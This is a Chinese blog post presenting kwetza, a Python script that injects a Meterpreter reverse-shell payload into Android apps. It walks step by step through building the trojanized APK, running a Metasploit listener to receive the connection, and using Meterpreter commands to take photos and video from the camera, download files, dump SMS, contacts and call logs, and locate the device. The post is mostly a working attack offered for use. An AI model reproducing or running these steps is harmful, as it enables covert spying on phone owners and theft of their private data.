kwetza - 向 Android 应用中注入 Meterpreter payload 的 Python 脚本
首页 > 资源分享 > 实用工具    作者:webbaozi   2017年6月13日 14:47 星期二   热度:1014°   百度已收录  
时间:2017-6-13 14:47   热度:1014° 

Getting the code

Firstly get the code:

git clone https://github.com/sensepost/kwetza.git 

Kwetza is written in Python and requires BeautifulSoup which can be installed using Pip:

pip install beautifulsoup4 

Kwetza requires Apktool to be install and accessible via your PATH. This can be setup using the install instructions located here:https://ibotpeaches.github.io/Apktool/install


Usage

python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no

  • nameOfTheApkToInfect.apk =name of the APK you wish to infect.
  • LHOST =IP of your listener.
  • LPORT =Port of your listener.
  • yes =include "yes" to inject additional evil perms into the app, "no" to utilize the default permissions of the app.
python kwetza.py hackme.apk 10.42.0.118 4444 yes
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

复现过程:

1.执行命令:


python kwetza.py hackme.apk 192.168.1.250 9696 yes


1.png

密钥库短语:password

2.msf进行监听


use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.1.250
SET LPORT 9696
run


2.png

3.回到安卓模拟器,打开先生成的apk文件

3.png

4.执行命令

4.png

相关命令:

cd               -->目录切换,命令:cd /  切换到根目录
search           -->搜索文件,命令:search *.jpg
download         -->下载文件,命令:download test.jpg
webcam_list      -->查看摄像头列表,因为手机都是前置和后置摄像头了
webcam_snap      -->拍照一张,需要选用前置或者后置摄像头,命令:webcam_snap -i 1
webcam_stream    -->开启摄像头视频监控,同上,命令:webcam_stream -i 1
安卓系统相关命令:
check_root       -->查看当前安卓是否已经root
dump_calllog     -->下载通话记录
dump_contacts    -->下载短信记录
dump_sms         -->下载通讯录
geolocate        -->利用谷歌地图定位(需要安装谷歌地图)

下载地址:

https://github.com/sensepost/kwetza

百度云下载:

链接: https://pan.baidu.com/s/1geDdWkj 密码: 6666

二维码加载中...
本文作者:webbaozi      文章标题: kwetza - 向 Android 应用中注入 Meterpreter payload 的 Python 脚本
本文地址:http://www.webbaozi.com/sygj/72.html
版权声明:若无注明,本文皆为“baozi|学与用”原创,转载请保留文章出处。
压力机2017-07-18 10:49
您好,您的网站做的很不错,很漂亮,我已经收藏了,方便我随时访问.

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1